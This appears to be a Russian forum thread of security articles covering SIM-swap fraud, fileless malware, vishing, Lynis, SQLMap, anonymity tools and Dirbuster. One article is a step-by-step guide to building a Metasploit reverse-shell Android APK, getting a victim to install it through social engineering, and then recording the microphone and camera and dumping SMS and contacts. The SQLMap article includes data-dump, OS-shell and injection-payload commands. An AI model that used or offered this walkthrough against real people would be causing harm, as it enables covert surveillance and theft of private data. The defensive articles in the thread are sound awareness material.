  • Сбор информации. Киберпреступники начинают свою атаку с тщательного сбора вашей личной информации. Эта сокровищница часто включает в себя данные, полученные из ваших профилей в социальных сетях, утечек данных или попыток фишинга. Вооружившись знаниями о вашем ФИО, дате рождения, номере телефона, они переходят к следующему этапу.
  • Общение с оператором мобильной связи. Имея ваши данные, мошенники хитро выдают себя за вас. Они инициируют контакт с вашим оператором мобильной связи, утверждая, что потеряли свой телефон или SIM-карту. В некоторых случаях они могут даже выдать себя за представителя службы поддержки вашего банка для большей правдоподобности.
  • Замена SIM-карты. Если обман увенчается успехом, оператор связи быстро активирует новую SIM-карту с вашим номером телефона, а затем деактивирует существующую. Этот поворотный момент наступает, когда вы теряете доступ к своему телефону, а злоумышленники захватывают контроль над вашей цифровой личностью.
  • Захват учетной записи. Получив контроль над вашим номером телефона, злоумышленники могут сбросить вашу электронную почту и банковские пароли. Из наиболее частых последствий следует ожидать несанкционированные финансовые операции и кражу личных данных.
57471c2b7c4e70d43cfb4d388cfa352b.jpg
Защита вашей цифровой личности

Теперь, когда мы раскрыли зловещие механизмы мошенничества с заменой SIM-карт, пришло время вооружиться знаниями и средствами защиты, необходимыми для предотвращения этих нежелательных атак.

  1. Выключение 2FA на основе SMS: хотя двухфакторная аутентификация на основе SMS удобна, она не надежна. Рассмотрите возможность перехода на более безопасные методы аутентификации, такие как биометрия.
  2. Мониторинг учетных записей: регулярно проверяйте свои финансовые учетные записи на предмет необычной активности. Раннее обнаружение может предотвратить негативные последствия скама с заменой SIM-карты.
  3. Будьте осторожны в Интернете: ограничьте личную информацию, которой вы делитесь в социальных сетях. Киберпреступники часто используют ее, чтобы выдать себя за вас.
  4. Установите код-пароль. Свяжитесь со своим оператором мобильной связи и установите уникальный персональный идентификационный номер (PIN-код) или код-пароль для своей учетной записи. Требуйте этот код в качестве обязательного этапа проверки, прежде чем можно будет внести какие-либо изменения.
  5. Используйте код восстановления электронной почты. Вместо того, чтобы полагаться на SMS для сброса пароля, установите код восстановления электронной почты. Это обеспечивает дополнительный уровень безопасности.
Цифровая безопасность в ваших руках

Пока мы плывем по коварные водам нашей цифровой эпохи, крайне важно оставаться на шаг впереди киберпреступников, которые неустанно разрабатывают новые тактики. Более того, мошенничество с заменой SIM-карт — лишь одно из проявлений продолжающейся борьбы за безопасность и конфиденциальность. Приняв контрмеры, изложенные в этой статье, вы можете значительно снизить возможность стать жертвой мошенничества. Помните, что знания — ваше самое мощное оружие в продолжающейся борьбе с киберугрозами. Будьте в курсе, сохраняйте бдительность и поделитесь этой статьей с другими, чтобы создать более безопасную цифровую среду для всех нас.

 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Бесфайловое вредоносное ПО: защита от невидимых угроз

Бесфайловое вредоносное ПО: защита от невидимых угроз


720d52d840ebe56538aacc4d0c4543b7.jpg


С каждым годом киберпреступники совершенствуют свои способы атак, стараясь делать вирусы менее заметными. И такие угрозы уже существуют в виде "бесфайловых" вирусов. И беспокоиться есть о чём, поскольку вредоносное программное обеспечение способно месяцами "сидеть" в ваших компьютерах, не давая о себе знать, а после чего нанести колоссальный ущерб. Что же представляет из себя этот вирус и как от него можно защититься?

4719e2bb04b931cd012341eefa545c14.jpg


Что такое бесфайловое вредоносное ПО


Обычно вредоносные программы внедряют в компьютер несколько файлов, которые содержат саму повреждающую компьютер программу, которая копирует какие-то важные для вас данные и перемещает их во внешнее хранилище. Антивирусы умеют успешно бороться с такими программами по их остаточным следам, это своеобразный почерк программы. Но "бесфайловые" вирусы умеют скрывать свои следы, маскируясь под обычные действия операционной системы. Такой вирус представляет из себя вредоносный код, который разработан таким образом, чтобы не записывать себя на жёсткий диск, а работать полностью из оперативной памяти.
Как же "бесфайловый" вирус попадает в систему? Наиболее вероятны два варианта:

  • через устаревшие браузеры и плагины (дополнения к возможностям программы);
  • через заражённые веб-страницы или электронные письма в формате .doc или .txt.
Как вернуть контроль над ПК

В этой ситуации главное действовать быстро, чтобы защитить конфиденциальную информацию. Вот шаги, которые вы можете предпринять, чтобы вернуть контроль над этим невидимым противником:

  1. Изоляция. Первым и наиболее важным шагом будет изолировать свое устройство от сети. Отключение интернета помешает злоумышленнику связаться со своими серверами управления и контроля.
  2. Сканирование и очистка. Для обнаружения и удаления безфайлового вредоносного ПО понадобятся специализированные инструменты. Традиционное антивирусное программное обеспечение не справится с этой задачей, поскольку оно не сможет обнаружить эти скрытые угрозы.
  3. Исправление и обновление. Нужно немедленно исправить уязвимое программное обеспечение, которое было использовано. А для предотвращения подобных атак важно всегда регулярно обновлять ПО.
  4. Изменение паролей. Везде, где только можно постарайтесь изменить свои пароли, чтобы злоумышленник не мог заполучить доступ к вашим учетным записям.
Как предотвратить заражение бесфайловым ПО

Избежать заражения можно простыми правилами информационной безопасности:

  • своевременное обновление браузера и антивируса. Эта мера сокращает риск попадания вирусов на 85%.
  • соблюдение предупреждений антивируса о посещаемых страницах. Антивирус никогда не запрещает доступ к безопасной странице. Если предупреждение появилось, то скорее всего на странице размещён зловредный программный код, который запустится автоматически, или сайт уже ранее использовался для совершения атак.
  • своевременное обновление операционной системы . Компания Microsoft выпускает регулярные патчи (файлы, исправляющие в программах ошибки, либо устанавливающие дополнения) для Windows, также происходит и у разработчиков других операционных систем. Важно понимать, что старая версия ОС более уязвима для злоумышленников и вероятность "подцепить" вирус выше.
  • удаление электронных писем с вложениями от неизвестных отправителей.
  • ограничение доступа третьих лиц к вашему компьютеру. Если предоставляете доступ, то убедитесь, что понимаете какие это права.
Заключение

Борьба с киберугрозами продолжается и постоянно меняется. Появляются невидимые вирусы, которые могут нанести удар, когда вы меньше всего этого ждете. Именно поэтому, мы должны оставаться на шаг впереди тех, кто стремится нарушить нашу конфиденциальность. Итак, в следующий раз, когда вы будете нажимать на безобидную ссылку, помните, что невидимая угроза бесфайлового вредоносного ПО реальна. Будьте готовы, ваш путь в области безопасности начинается со знаний о киберугрозах. Надеемся, что эта статья оказалась информативной и поучительной для вас. Удачи!

 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Вишинг: Что это такое и как защититься

Вишинг: Что это такое и как защититься

По мере развития технологий совершенствуется и тактика киберпреступников, стремящихся завладеть личной и финансовой информацией пользователей. Одним из таких способов мошенничества, получивший известность в последние годы, является вишинг. В этой статье мы подробно изучим мир вишинга, поймем, как он работает, и вооружимся знаниями, которые помогут предотвратить такое мошенничество и защитить вашу личную информацию.

ea05e6b03615a1a690f7a95b2cfad6f0.jpg


Открывая мир вишинга

Вишинг (англ. Vishing, сокращение от “voice phishing,”), что в переводе означает «голосовой фишинг», — это тип атаки с использованием социальной инженерии, при которой злоумышленники выдают себя за доверенные организации или отдельных лиц посредством телефонных звонков или сообщений голосовой почты. Конечная цель — получить личную, финансовую и конфиденциальную информацию от своих жертв.
Мошенники каждый раз действуют по определенной схеме: рассылают сообщения с вредоносными ссылками, после перехода по которым, отображается синий экран с предупреждающим сообщением и бесплатным номером телефона, по которому следует позвонить для устранения возникшей проблемы с компьютером.
По указанному номеру телефона отвечает технический специалист, готовый оказать любую помощь пользователю, после того как последний предоставит «специалисту» информацию о своей кредитной карте для оплаты программного обеспечения. После передачи потерпевшим данной информации, мошеннические действия завершаются, программное обеспечение не работает, технический специалист не отвечает, а денежные средства с банковской карты пропадают.
Распознать потенциальное мошенничество можно по определенным предупреждающим знакам:

  • Доверенные лица. Зачастую мошенники представляются экспертами или специалистами в каких-либо областях. При этом, они могут называться компьютерными специалистами, банкирами, полицейскими и т.д. Целью этого подражания является создание у жертв ложного чувства безопасности.
  • Срочность и страх. Мошенники манипулируют жертвами, вызывая у них чувство неотложности или страха. Например, они могут заявить, что ваш банковский счет заблокирован и необходимо немедленно снять блокировку. Эта срочность вынуждает людей поспешно раскрывать конфиденциальную информацию.
Инструменты для поиска жертвы

В схемах вишинга злоумышленники используют генераторы мобильных номеров и скрипты для проверки их валидности (чекеры). Как понятно из названия, генератор создает подборку номеров, а чекеры проверяют, активны ли они.

cc79322c2ed05589c37be1369476086d.jpg



6a8c5324dacd7af0c17756bb577dc601.jpg

На этих скриншотах вы можете увидеть, как происходит проверка сгенерированных ранее мобильных номеров. Кроме, их валидации, указывается регион и провайдер связи. В итоге злоумышленник получает список номеров для распространения мошеннических сообщений. Такие же инструменты используются, например, для сбора контактов из мессенджеров.
Некоторые инструменты открыто можно найти в легальных магазинах приложений, по типу Chrome Store и Google Play.

5c1ab301b363629ee4913b8052aad04f.jpg

Существует множество магазинов, где мошенник может купить базы данных потенциальных жертв (обычно это email или мобильные номера, а также может быть фамилия и имя человека, регион проживания). Данные магазины могут использоваться для покупки, например, базы мобильных номеров для спама и телефонного мошенничества. Также там можно приобрести аккаунты соцсетей и мессенджеров для последующего совершения мошеннической атаки.

58242b5f86516dd6d5e97fbc3f260c50.jpg

Как защититься от вишинга

1. Проверьте личность вызывающего абонента
Никогда не доверяйте слепо информации абонента, даже если она, как вам кажется, получена из надежного источника. Если во время телефонного звонка вам поступил запрос о вашей личной информации, немедленно повесьте трубку. Затем самостоятельно проверьте личность звонящего по официальным каналам.
2. Берегите свою личную информацию
Ни при каких обстоятельствах вы не должны сообщать личную или финансовую информацию по телефону, особенно если звонок был инициирован не вами. Законные организации никогда не будут запрашивать по телефону конфиденциальные данные, такие как номера социального страхования, пароли учетных записей или данные кредитной карты.
3. Не идите на поводу у манипулятора
Вишинг-мошенники полагаются на тактику эмоционального давления, чтобы подтолкнуть вас к принятию импульсивных решений. Всегда оставайтесь при совсем мнении. Прервите разговор, дайте себе время на обдумывание услышанного.
4. Используйте защиту от спам-звонков
Все современные мобильные телефоны оснащены функцией проверки вызовов, которая может помочь выявить и заблокировать все нежелательные звонки.
Заключение

Вишинг представляет собой серьезную угрозу в наш цифровой век. Однако, понимая механику телефонного мошенничества, и следуя подробным советам, представленным в этой статье, вы сможете значительно обезопасить себя. Помните, что ваша личная информация бесценна, и ее защита имеет первостепенное значение. Следите за нашими статьями, чтобы оставаться в курсе, так как осведомленность и осторожность помогут вам оставаться на шаг впереди мошенников и не стать их жертвой.

 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Взлом Android с помощью Metasploit и Msfvenom

Взлом Android с помощью Metasploit и Msfvenom

Вы, наверное, ни раз слышали о самом известном хакерском инструменте под названием Metasploit. Все профессиональные хакеры в один голос скажут, что Metasploit — универсальный инструмент, который имеет множество модулей для взлома Android, IOS, а также Windows. А его работа с Msfvenom считается лучшей комбинацией для взлома устройств Android, что мы сегодня и проверим.

9a20e85a77c51cb01f2056a3f1bf195f.jpg


Metaspoilt и Msfvenom

Так почему же все так любят Metasploit? Metasploit, созданный Rapid7, имеет самую большую базу эксплойтов, шеллкодов и много разнообразной документации. А самое приятное, что все это абсолютно бесплатно. В народе его даже успели прозвать “хакерским швейцарским ножом”.
Msfvenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, «брат» Metasploit. Стоит отметить, что теперь этот инструмент есть и в Kali Linux как отдельная опция, позволяющая максимально упростить работу.
Когда дело доходит до взлома телефонов Android, существует множество способов сделать это. Есть приложения, сайты, скрипты и многое другое. Мы уже ни раз демонстрировали вам различные методы взломов, ну а сегодня мы расскажем, как взломать телефон Android с помощью Metasploit и Msfvenom.
Как взломать Android
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.​
Для выполнения этого взлома с использованием Metasploit и Msfvenom вам понадобится ОС Kali Linux.
Итак, приступим к взлому.
Шаг 1. Создание вредоносного APK-файла
Откройте терминал Kali Linux и введите следующую команду:

0c87f5a5be3301c338297d495713d77a.jpg

# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hacking.apk*LHOST= Ваш IP-адрес
*LPORT= 4444
*Используйте ifconfig, чтобы найти свой IP-адрес, если вы его не знаете.
# ifconfig
Шаг 2. Отправка APK-файла жертве
Вы создали вредоносный .apk-файл шпионского приложения с помощью Metasploit и Msfvenom. По умолчанию он будет сохранен в вашей папке /home/. Найдите свой недавно созданный файл hacking.apk и отправьте его жертве. Используйте навыки социальной инженерии, чтобы заставить жертву установить файл.
*Если у вас возникли какие-либо ошибки или проблемы с подписью, используйте следующее:
Keytool (предустановлен в Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000​
Jarsigner (предустановлен в Kali Linux)
Затем введите:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hacking.apk aliasname​
После этого:
jarsigner -verify -verbose -certs hacking.apk​
Шаг 3. Настройка Metasploit
Откройте новый терминал и используйте следующую команду, чтобы запустить платформу Metasploit.

75240edd71ff872fd844f80f64e0cd70.jpg



# msfconsole
Теперь в консоли платформы Metasploit введите следующее:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
после этого настройте адрес прослушивающего хоста:
set LHOST 192.168.78.129
set LPORT 4444

exploit
*LHOST= Ваш IP-адрес
*LPORT= 4444
Шаг 4. Эксплуатация
Теперь, когда жертва откроет приложение на своем телефоне, вы получите полный доступ к устройству.
Вот некоторые команды, которые вы можете использовать:

  • record_mic — записывает звук с устройства Android и сохраняет его на локальном диске.
  • webcam_snap — позволяет делать снимки, взломав камеру Android устройства.
  • webcam_stream — транслирует онлайн видео со взломанной камеры Android.
  • dump_contacts — копирует все контакты с телефона жертвы.
  • dump_sms — взламывает сообщения жертвы и сохраняет их в текстовом файле в вашей системе.
  • geolocate — отслеживает взломанное устройство по местоположению.
Заключение

Хотя Metasploit и Msfvenom не так сложны в использовании, они требуют последовательных шагов, которые необходимо реализовать. Но благодаря нашему руководству любой начинающий хакер с лёгкостью осилит эти инструменты. Надеемся, что эта статья была для вас информативной и полезной. Удачи!


 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Lynis — лучший инструмент безопасности Kali Linux

9db04a9f674b00edb81b1e8f53b4141b.jpg

Вступить в наш чат
Уровень киберпреступности увеличивается с каждым годом, а хакеры используют все более изощренные методы для кражи данных и проникновения в системы. Готовы ли вы противостоять новым угрозами? Приготовьтесь, потому что сегодня мы расскажем об одном мощном инструменте под названием Lynis, который изменит ваше восприятие безопасности и защитит вашу систему. Независимо от того, являетесь ли вы начинающим хакером, системным администратором или просто обычным пользователем, интересующимся безопасностью своего цифрового мира, этот инструмент должен быть в вашем арсенале. Итак, пристегните ремни безопасности и отправляйтесь в это захватывающее путешествие вместе с нами.
f002fa580330c9c901260aed828661b3.jpg

Что такое Lynis
Lynis — это надежный инструмент аудита безопасности с открытым исходным кодом, который работает в системах на базе Unix, что делает его идеальным компаньоном для пользователей Kali Linux. Lynis может в два счета проанализировать состояние вашего ПК и предоставить вам ценную информацию по безопасности. Инструмент предназначен для обнаружения уязвимостей, проблем с конфигурацией и потенциальных угроз в вашей системе. Одним словом, Lynis — незаменимый помощник для каждого, кто серьезно относится к защите своих данных.

Установка Lynis
Давайте приступим к установке самого инструмента. К счастью, этот процесс прост для пользователей Kali Linux. Откройте терминал и введите следующую команду:

sudo apt-get install lynis
После этого Lynis будет загружен и установлен в вашей системе.



89f002b65bc90b49dd3974b7d0e61349.jpg


Использование Lynis: первое сканирование
Теперь, когда у вас установлен Lynis, давайте проведем первое сканирование вашей системы. Откройте терминал и введите:

sudo lynis audit system
Lynis начнет сканирование вашей безопастности и через несколько минут создаст подробный отчет, в котором будут указаны потенциальные проблемы безопасности и предложены улучшения. Отчет охватывает широкий спектр областей, включая права доступа к файлам, учетные записи пользователей, системное программное обеспечение и настройки сети.

e9fc68c9f94153e8eb58d92dca03d9f3.jpg


Управление Lynis
По умолчанию Lynis начинает проверку, а затем приостанавливает ее после завершения каждого этапа. Вы можете легко остановить программу в любой момент, используя сочетание клавиш CTRL+C, или нажать клавишу ВВОД, что позволит перейти к следующей проверке. Однако, если вы хотите, чтобы проверка была непрерывной, то вы можете использовать дополнительный параметр: –quick.

lynis audit system --quick
Общие команды и параметры
При использовании этого инструмента вам могут пригодиться следующие команды:

audit system: Проводит комплексный аудит системы.
show commands: Демонстрирует список доступных команд.
show help: Экран с инструкциями к использованию.
show profiles: Отображает обнаруженные профили.
show settings: Список всех активных настроек, полученных из профилей.
show version: Показывает текущую версию инструмента.
Обратите внимание, что для команды «show» требуется новейшая версия Lynis.

Доступные параметры:

--auditor "имя" — присвоить аудиту имя.
--checkall -c — начать проверку.
--check-update — проверить актуальность Lynis.
--cronjob — запустить Lynis как cronjob (включает -c -Q).
--help — отобразить справку.
--nocolors — не использовать цвета.
--pentest — выполнить тестирование на проникновение (без привилегий).
--quick — не ждать ввода данных пользователем, за исключением ошибок.
--quiet — показать только предупреждения (включает —quick, но не ждет).
--reverse-colors — использовать другую цветовую схему для светлого фона.
--version — проверить версию программы (и выйти).
Полезные советы
Вот несколько советов, которые помогут улучшить качество работы с Lynis:

Если Lynis не установлен в виде пакета с включенной страницей руководства, вы можете получить доступ к руководству, используя –man или запустив nroff -man ./lynis.8.
Для систем со светлым фоном оболочки рассмотрите возможность использования –no-colors или –reverse-colors для улучшения видимости.
Используйте команду show, чтобы просмотреть полный список доступных параметров Lynis.
Возможности Lynis
Lynis — универсальный инструмент с множеством возможностей. Вот некоторые ключевые особенности, которые делают этот инструмент незаменимым:

Обнаружение уязвимостей: он сканирует вашу систему на наличие известных уязвимостей в программных пакетах, помогая вам оставаться на шаг злоумышленников. Для большей наглядности Lynis использует условные обозначения в виде цветов:

зелёный: всё хорошо;
жёлтый: не нашёл всё необходимое, или возникла спорная ситуация;
красный: это проблема, стоит с ней разобраться.
Проверки конфигурации. Линис оценивает конфигурацию вашей системы на соответствие передовым технологиям, гарантируя, что ваша система настроена безопасно.

Советы по усилению безопасности. Этот инструмент предоставляет практические рекомендации по усилению безопасности вашей системы, помогая вам принимать обоснованные решения для защиты вашей среды.

Сканирование вредоносных программ. Он также может сканировать вашу систему на наличие вредоносных программ.

Аудит соответствия. Lynis помогает провести аудит вашей системы на предмет соответствия различным стандартам и рекомендациям безопасности, таким как тесты CIS.

Производительность. Оценивает производительность вашей системы и предлагает варианты оптимизации для повышения ее эффективности.

Настройка. Этот инструмент можно настроить в соответствии с вашими конкретными потребностями, изменив его файл конфигурации.

Советы по безопасности Lynis
Хотя Lynis является мощным инструментом для защиты вашей системы, важно помнить, что он также может быть использован злоумышленниками. Чтобы обезопасить себя от потенциальных угроз, соблюдайте следующие меры предосторожности:

Используйте только проверенные источники: загружайте Lynis из надежных источников, таких как официальные репозитории.
Регулярное обновление: обновляйте Lynis, чтобы ваша версия имела все последние улучшения безопасности.
Просмотр отчетов о сканировании. Всегда просматривайте отчеты о сканировании, созданные Lynis, чтобы оперативно устранять любые выявленные проблемы.
Заключение
Сегодня мы узнали, как установить Lynis на Kali Linux и как запустить первое сканирование. Lynis с его обширными возможностями и простотой использования может стать ценным дополнением к вашему арсеналу кибербезопасности. Готовы взять под контроль безопасность вашей системы? Установите Lynis сегодня и откройте для себя более безопасный цифровой мир.​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
SQLMap: руководство по безопасности ваших данных

SQLMap: руководство по безопасности ваших данных


4616031c7be81c0484177a8de910b2db.jpg



Вступить в наш чат​

В постоянно меняющемся мире кибербезопасности крайне важно оставаться на шаг впереди потенциальных угроз. Встречайте SQLMap — мощный инструмент тестирования на проникновение с открытым исходным кодом, предназначенный для выявления и использования уязвимостей, связанных с внедрением SQL-кода. В этом руководстве вы узнаете об эффективной защите ваших данных.


0bc449d3f240312bb080958c739ae8b1.jpg

Установка

Вы можете легко установить SQLMap в Kali Linux, выполнив следующие действия:

Откройте терминал: запустите окно терминала в вашей системе Kali Linux.

Обновите список пакетов: рекомендуется всегда обновлять список пакетов, выполнив следующую команду:

sudo apt update
После обновления списка пакетов вы можете установить SQLMap с помощью следующей команды:

sudo apt install sqlmap
Проверка установки: после завершения установки вы можете убедиться, что SQLMap успешно установлен, выполнив следующую команду:

sqlmap --version


36d8da2a711bed42f46c7d6fe64c6c9f.jpg


SQLMap установлен и готов к использованию.

Возможности SQLMap
Прежде чем мы углубимся в практические аспекты, давайте познакомимся с впечатляющим набором функций, которые выделяют SQLMap среди прочих инструментов.

Автоматическое сканирование: SQLMap упрощает процесс сканирования веб-приложений на наличие уязвимостей SQL-инъекций. Это достигается за счет автоматического анализа параметров, что значительно сокращает количество манипуляций, необходимых для обнаружения уязвимостей.
Базы данных: SQLMap умеет определять тип и версию системы управления базами данных (СУБД). Будь то MySQL, PostgreSQL или Microsoft SQL Server, SQLMap может точно его идентифицировать.
Извлечение данных: выходя за рамки простого обнаружения, SQLMap превосходно справляется с извлечением данных из базы данных. Это позволяет извлекать конфиденциальную информацию, хранящуюся в базе данных.
Обход аутентификации: В определенных сценариях SQLMap можно использовать для обхода механизмов аутентификации, предоставляя несанкционированный доступ к приложению. Это наглядно подчеркивает важность надежных протоколов аутентификации.
Постэксплуатация: Кроме того, SQLMap расширяет свои возможности за пределы обнаружения уязвимостей, позволяя тестировщикам выполнять команды операционной системы на сервере, на котором размещена база данных. Это, в свою очередь, усиливает острую потребность в надежной безопасности серверов.
Настройка: SQLMap дает пользователям возможность настраивать свои тесты, указывая опции. Это гарантирует, что инструмент легко адаптируется к широкому спектру приложений и сценариев тестирования.
Раскрытие потенциала SQLMap
Теперь давайте более подробно рассмотрим возможности SQLMap, изучив его практическое использование:

Оценка уязвимостей: SQLMap служит важным инструментом для выявления уязвимостей внедрения SQL в приложениях и на сайтах. Имитируя атаки, он помогает тестировщикам выявить потенциальные слабости, которыми могут воспользоваться злоумышленники. Более того, он предлагает незаменимый ресурс для оценки безопасности.

Тестирование безопасности баз данных: Организации могут использовать SQLMap для оценки безопасности своих баз данных. Заблаговременно выявляя и устраняя уязвимости, они могут усилить свои меры защиты данных. Более того, SQLMap обеспечивает комплексный подход к защите конфиденциальной информации.

Основные команды SQLMap
Теперь давайте рассмотрим некоторые команды SQLMap и их использование:

Базовое сканирование
Представьте, что вы тестируете страницу входа сайта по адресу «http://example.com/login.php» с параметрами «admin» и «password». Чтобы запустить базовый тест внедрения SQL, вы должны использовать следующую команду:

sqlmap -u "http://example.com/login.php?user=admin&password=test"


e0eec3a177fbbf06232028f3647b5e18.jpg



SQLMap автоматически обнаружит параметры и оценит URL-адрес на наличие уязвимостей SQL-инъекций.

Отпечатки базы данных
Предположим, вы исследуете страницу по адресу «http://example.com/product.php» с параметром «id». Вы подозреваете, что он уязвим для SQL-инъекций, и хотите указать СУБД как MySQL. Тогда вам нужно использовать эту команду:

sqlmap -u "http://example.com/product.php?id=1" --dbms=MySQL
Извлечение данных
Допустим, вы успешно воспользовались уязвимостью SQL-инъекции на странице поиска «http://example.com/insecure_search.php» с параметром «query». Если вы хотите извлечь данные из базы данных, используете следующую команду:

sqlmap -u "http://example.com/insecure_search.php?query=test" --dump
SQLMap продолжит извлечение данных, предоставляя вам конфиденциальную информацию, хранящуюся в базе данных. Вы тестируете страницу входа по адресу «http://example.com/login.php», защищенную аутентификацией BASIC. Чтобы попытаться обойти аутентификацию во время тестирования, используйте следующую команду:

sqlmap -u "http://example.com/login.php" --auth-type=BASIC
SQLMap попытается обойти механизмы аутентификации BASIC.

Постэксплуатация
Представьте, что вы обнаружили уязвимость SQL-инъекции на странице «http://example.com/injectable_page.php» с параметром «param». После успешной эксплуатации вы хотите получить доступ к интерактивной оболочке операционной системы:

sqlmap -u "http://example.com/injectable_page.php?param=test" --os-shell
Он предоставит вам интерактивную оболочку на сервере, на котором размещена база данных.

Вы тестируете страницу поиска по адресу «http://example.com/search.php» с параметром «query». Чтобы настроить полезную нагрузку для тестирования SQL-инъекций, используйте в качестве примера следующую команду:

sqlmap -u "http://example.com/search.php?query=test" --data="query=test' OR '1'='1'"
Конфигурационный файл
Предположим, у вас есть HTTP-запрос, сохраненный в файле с именем «request.txt», который вы хотите использовать для тестирования. Вы можете использовать этот файл запроса с помощью следующей команды:

sqlmap -r request.txt

b9a2020e167dfcd861841b1ac720f97c.jpg



Инструмент будет использовать файл запроса для запуска тестов, что полезно для сложных сценариев тестирования.

Расширенные настройки
Допустим, в рамках тонкой настройки процесса тестирования вы хотите установить тайм-аут 10 секунд для HTTP-запросов. Вы можете использовать эту расширенную опцию:

sqlmap --timeout=10
Это позволит настроить продолжительность тайм-аута для HTTP-запросов до 10 секунд.

Заключение
В эпоху, когда киберугрозы поджидают на каждом шагу, SQLMap выступает в качестве мощного союзника, повышающего безопасность сайтов и баз данных. Более того, освоив его функции и тщательно соблюдая принципы этического использования, вы сможете активно способствовать созданию более безопасной цифровой среды.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как сохранить анонимность в интернете

Как сохранить анонимность в интернете


20d83a1d7f6c2d098306d275e14b95f0.jpg



Вступить в наш чат
Какие следы в интернете вы оставляете, а главное, что можно по ним узнать? Гораздо больше, чем вы думаете. Любая собранная информация может быть использована для идентификации вашей личности. Чтобы этого избежать, мы подготовили для вас два инструмента, которые помогут замести следы, обеспечив безопасность в сети.


89c5638012a4320c098c497f52d022bd.jpg

Инструменты для анонимности в сети
Anonsurf — это инструмент для изменения IP-адреса в Kali Linux, разработанный командой Parrot Sec. Он работает в фоновом режиме, постоянно меняя ваш IP-адрес, чтобы вы оставались анонимными. Anonsurf использует два основных сервиса для обеспечения анонимности в Интернете. Один из них — Tor, а другой — iptables, служба Linux для управления IP-адресами. Он имеет открытый репозиторий на Github.

Macchanger — это встроенный инструмент Kali Linux, который может изменить ваш Mac-адрес. Он имеет множество функций для сохранения вашей анонимности.

Итак, приступим к установке и настройке Anonsurf и Macchanger в Kali Linux.

Как изменение IP и Mac-адреса делают вас анонимными
Ваш IP и MAC-адреса — это уникальные идентификаторы, по которым можно вас найти. Ваши системные данные, а также местоположение можно отслеживать с помощью ваших адресов. Таким образом, когда вы измените свой Mac и IP-адреса, вас не получится деанонимизировать.

Установка Anonsurf
Шаг 1. Откройте терминал в Kali Linux и используйте следующую команду, клонирующую репозиторий Anonsurf из Github:

git clone https://github.com/Und3rf10w/kali-anonsurf.git


b33cac496e097b7ef409fa077521df01.jpg


Шаг 2. Измените каталог и дайте разрешения anonsurf. Вы можете сделать это с помощью следующих команд:

cd kali anonsurf
****d +x ./installer.sh
Шаг 3. Запустите сценарий anonsurf:

sudo ./installer.sh


b4bb78f57d755ed79d2ff382b4d4fe54.jpg


Шаг 4. Теперь начнется установка и будут установлены зависимости.

Шаг 5. После завершения установки введите команду help, чтобы получить список всех возможных опций инструмента:

anonsurf help


aecd1133d066e37b5b6fd172e591ce80.jpg


Шаг 6. Теперь запустите службу Anonsurf:

anonsurf start
Поздравляем, ваш IP-адрес скрыт. Теперь изменим MAC-адрес вашей системы.

eff550c3427f4ddb43e2bb2a8f83a502.jpg



Установка Macchanger
Шаг 1. Выключите сетевую карту. Используйте следующую команду Linux, чтобы отключить сетевую карту:

ifconfig device down
Используйте команду ifconfig, чтобы найти имя вашего устройства.

Это будет либо eth0,eth1 или wlan0, wlan1 и т. д.

Шаг 2. Установите случайный MAC-адрес:

macchanger -r eth0


bc5d2cf59cd16e765480e6570c896a3f.jpg



Как видно на изображении выше, Mac-адрес был изменен.

Чтобы проверить все команды, используйте опцию справки:

macchanger -h
Примечание: Постоянный MAC-адрес будет восстановлен после перезагрузки.


b98070b80cde13ed28f0c90b84fd6956.jpg


Шаг 3. Включите сетевую карту:

ifconfig eth0 up
Шаг 4. Восстановите Mac-адрес по умолчанию. Если вы хотите восстановить ваш MAC-адрес, используйте следующие команды:

macchanger –p eth0
Шаг 5. Подмена Mac-адреса.


1224672c92cb50dfd1ee9a68d0d0357d.jpg


Вы можете подделать MAC-адрес, используя следующую команду:

macchanger -m [Spoofing MAC Address] eth0
macchanger -m XX:XX:XX:XX:XX:XX eth0
Здесь XX:XX:XX:XX:XX:XX следует заменить на целевой MAC-адрес.

Если вы получили следующую ошибку:

ОШИБКА: Невозможно изменить MAC: интерфейс включен или нет разрешения: невозможно назначить запрошенный адрес.

То вам нужно отключить сетевой интерфейс, а затем изменить MAC-адрес, введя команду:

ifconfig wlan1 down
Теперь вы полностью анонимны, поскольку ваш IP и MAC адреса скрыты.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Dirbuster: ваш ангел-хранитель в мире кибербезопасности

Dirbuster: ваш ангел-хранитель в мире кибербезопасности



8573de0561a02286f9a962969c41ad3e.jpg



Вступить в наш чат
В бесконечном противостоянии с киберугрозами инструмент под названием Dirbuster выступает грозным оружием. В этой статье мы окунемся в мир Dirbuster, раскрыв все его секреты и потенциал для защиты вашего цифрового мира.


169a0e3df4546522b1d017c5a4cab0fd.jpg


Скрытые угрозы
Прежде чем мы раскроем возможности Dirbuster, давайте признаем зловещую реальность цифрового мира. Каждый день хакеры и злоумышленники рыскают в поисках уязвимостей, подобно призрачным хищникам, которые скрываются в темных уголках киберпространства, затаившись в ожидании идеального момента для удара.

Каждый пользователь обязан сохранять бдительность, чтобы не стать жертвовать злоумышленников. Одним из фундаментальных принципов кибербезопасности является обеспечение защиты ваших данных от взломов. Именно здесь в игру вступает Dirbuster.

Dirbuster: на страже вашего сайта
Этот мощный инструмент предназначен для проведения разведки сайтов, помогая обнаружить скрытые каталоги и файлы. Интрумент неустанно сканирует ваш веб-сервер, выявляя потенциальные уязвимости до того, как злоумышленники смогут ими воспользоваться.

